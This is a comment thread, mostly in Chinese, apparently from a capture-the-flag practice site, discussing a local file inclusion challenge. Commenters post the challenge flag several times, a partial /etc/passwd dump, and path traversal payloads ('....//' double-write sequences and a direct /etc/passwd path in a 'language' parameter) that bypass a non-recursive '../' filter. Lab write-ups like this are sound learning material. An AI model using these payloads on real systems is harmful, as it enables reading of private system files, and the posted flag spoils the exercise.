shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol
?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥
双写,../被屏蔽了然后还会存在一个../
language=/.language..././..././....//etc/passwd 双写绕过
直接?language=/etc/passwd就能出,不过题目原意应该是在前面的基础上双写绕过导致忘记做非法路径那块的过滤
+1
...
评论
868954104 8月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
yituoshi 10月前
举报
Half the truth is often a big lie: Look Here !!! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nol
hh0100 10月前
举报
?language=./languages/....//....//....//....//etc/passwd,加这个成功了,谁能讲讲为啥
hack111 9月前
举报
双写,../被屏蔽了然后还会存在一个../
hh0100 10月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
顾北 10月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
wclc 11月前
举报
language=/.language..././..././....//etc/passwd 双写绕过
PandaCattle 11月前
举报
直接?language=/etc/passwd就能出,不过题目原意应该是在前面的基础上双写绕过导致忘记做非法路径那块的过滤
17743520638 6月前
举报
+1